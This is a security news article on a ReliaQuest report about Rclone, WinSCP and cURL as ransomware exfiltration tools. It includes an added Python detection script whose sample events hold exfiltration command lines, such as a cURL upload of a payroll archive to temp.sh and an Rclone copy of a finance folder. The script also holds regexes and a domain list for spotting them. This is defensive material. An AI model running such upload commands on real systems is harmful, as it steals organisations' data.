
Threat actors prefer Rclone, WinSCP and cURL as data exfiltration tools

Data exfiltration is a critical step in double-extortion cyberattacks, which have become the new gold standard for ransomware operations.

A new report from ReliaQuest finds that Rclone, WinSCP, and Client URL (cURL) were the three data exfiltration tools most commonly used by cybercriminals between September 2023 and July 2024.

Data exfiltration, the unauthorized uploading or downloading of data from corporate or personal devices, can involve infrastructure owned by the threat actor or third-party cloud services.

To exfiltrate data, attackers typically use legitimate or custom tools that let them collect and extract large amounts of data, and then threaten to disclose that data if the victim refuses to pay the ransom.

According to ReliaQuest, most of the well-known ransomware groups such as LockBit, Black Basta, and BlackSuit prefer to use the three tools mentioned above.

Others, such as Inc Ransom, prefer to use more unusual tools, such as legitimate file managers and remote monitoring and management (RMM) software.

Most Common Data Exfiltration Tools

Rclone

Rclone is a legitimate, open-source command-line tool that lets users sync files with various cloud storage providers as well as standard infrastructure such as File Transfer Protocol (FTP) servers.

It is also the most popular exfiltration tool used by cybercriminals, with 57% of ransomware incidents involving it during the reporting period.

The appeal of Rclone comes from its fast data transfer capabilities and versatility.

For example, Rclone integrates with a number of cloud services, including Google Drive, Amazon S3, and Mega, as well as protocols like FTP, which complicates mitigation for defenders because there is no single destination to block.

Rclone also runs on Windows, Linux, and macOS and allows for easy automation of operations, making it very efficient for large data transfers.

“Its legality as a backup tool used by IT professionals helps threat actors avoid detection or raise alarms,” the ReliaQuest report added.

WinSCP

WinSCP is an open-source file transfer tool for Windows that offers functionality similar to Rclone but with a user-friendly graphical interface.

While WinSCP focuses on transfers from local to remote locations, Rclone is a command line tool designed to manage files across various cloud storage services.

WinSCP is widely used in organizations and is a trusted, legitimate tool that reduces suspicion when found on an endpoint. Its portability and scripting capabilities facilitate efficient data transfer, both automated and manual. Additionally, WinSCP’s effective error handling and logging features ensure successful exfiltration of specified data.

cURL

Client URL (cURL) is a command-line tool for transferring data to or from a destination specified by a URL.

It supports protocols such as HTTPS, FTP, and SFTP and is commonly used for tasks such as downloading or uploading data and interacting with network services. It is cross-platform and available on Windows, macOS, and Linux.

“cURL is also native to Windows 10 version 1803 and later, meaning attackers don’t need to inject cURL into the target environment, allowing them to ‘live off the land,’” ReliaQuest added.

Compared to Rclone and WinSCP, cURL is less reliable for large-scale data exfiltration. However, it can be a very effective tool for exfiltrating small amounts of high-value information about a target organization.

In May 2024, ReliaQuest observed that the Black Basta ransomware threat actor group leveraged cURL in conjunction with the temp(.)sh cloud storage domain to successfully steal confidential data from organizations.
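The three tools above are all legitimate binaries, so the detection signal is not the binary itself but how it is invoked: Rclone running a transfer command against a configured remote, WinSCP driven by a script or command file, or cURL called with an upload option or pointed at a file-sharing domain such as the temp.sh service named above. The following script, an added example that is not part of the ReliaQuest report or this article, runs such rules over a handful of constructed process-creation events (the field names, the sample command lines, and the list of file-sharing domains are all assumptions for illustration).

```python
"""Triage process-creation events for Rclone, WinSCP and cURL usage patterns
that resemble data exfiltration. Added example; the events below are constructed
and the field layout loosely mimics a Sysmon Event ID 1 / EDR record."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "C:\\Tools\\rclone.exe",
     "cmdline": "rclone.exe copy C:\\Finance remote:backup --transfers 32 -q"},
    {"host": "ws02", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -T C:\\Users\\a\\Documents\\payroll.zip https://temp.sh/upload"},
    {"host": "srv03", "image": "C:\\Program Files\\WinSCP\\WinSCP.com",
     "cmdline": "WinSCP.com /script=C:\\Temp\\up.txt /log=C:\\Temp\\up.log"},
    {"host": "ws04", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -s https://example.com/index.html -o index.html"},
    {"host": "ws05", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# File-sharing destinations to treat as high-risk. temp.sh and Mega are named in
# the article; the exact hostnames here are an assumption and should be tuned.
SHARING_DOMAINS = ("temp.sh", "mega.nz", "mega.io")

# cURL options that push local data to a remote host (file upload, form field
# from file, request body from file).
CURL_UPLOAD_RE = re.compile(r"(?:^|\s)(?:-T|--upload-file|--data-binary\s+@|-d\s+@|-F\s+\S*=@)")
# Rclone subcommands that move data between the local host and a remote.
RCLONE_XFER_RE = re.compile(r"\b(?:copy|copyto|sync|move|moveto)\b")
# WinSCP console switches that run a scripted, unattended session.
WINSCP_SCRIPT_RE = re.compile(r"/(?:script|command)=?", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for a suspicious event, or None if benign."""
    exe = basename(event["image"])
    cmd = event["cmdline"]
    lower = cmd.lower()
    dest_hit = next((d for d in SHARING_DOMAINS if d in lower), None)

    if exe.startswith("rclone") and RCLONE_XFER_RE.search(lower):
        return ("high", "rclone transfer command against a configured remote")
    if exe in ("winscp.com", "winscp.exe") and WINSCP_SCRIPT_RE.search(cmd):
        return ("medium", "WinSCP console driven by /script or /command (unattended transfer)")
    if exe.startswith("curl"):
        if CURL_UPLOAD_RE.search(cmd):
            severity = "high" if dest_hit else "medium"
            target = f" to {dest_hit}" if dest_hit else ""
            return (severity, f"curl invoked with an upload option{target}")
        if dest_hit:
            return ("medium", f"curl contacting file-sharing domain {dest_hit}")
    return None


def find_exfil_candidates(events):
    """Run classify() over every event and collect the hits for an analyst queue."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        severity, reason = hit
        findings.append({"host": ev["host"], "severity": severity,
                         "reason": reason, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in find_exfil_candidates(SAMPLE_EVENTS):
        print(f"[{f['severity']:<6}] {f['host']}: {f['reason']} :: {f['cmdline']}")
```

Matching on the image name alone is the weak point of this approach: a renamed binary slips past it, so in production the rule should key on the executable's original file name or hash from the endpoint sensor, and be corroborated with network telemetry (large outbound transfers, first-seen destinations). Rclone running a transfer on an ordinary workstation warrants a high severity on its own, since the tool's legitimate use is largely confined to backup and administration hosts that can be allow-listed.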

Other Data Exfiltration Tools

In addition to these three tools, attackers also use other tools to steal data.

These include file storage and transfer tools (MEGA Cloud Storage, FileZilla), backup programs (Restic), and remote monitoring and management (RMM) software.

“It is also important to consider tools that allow for the exfiltration of small amounts of data and the persistent threat of non-standard exfiltration tools,” the ReliaQuest researchers concluded.
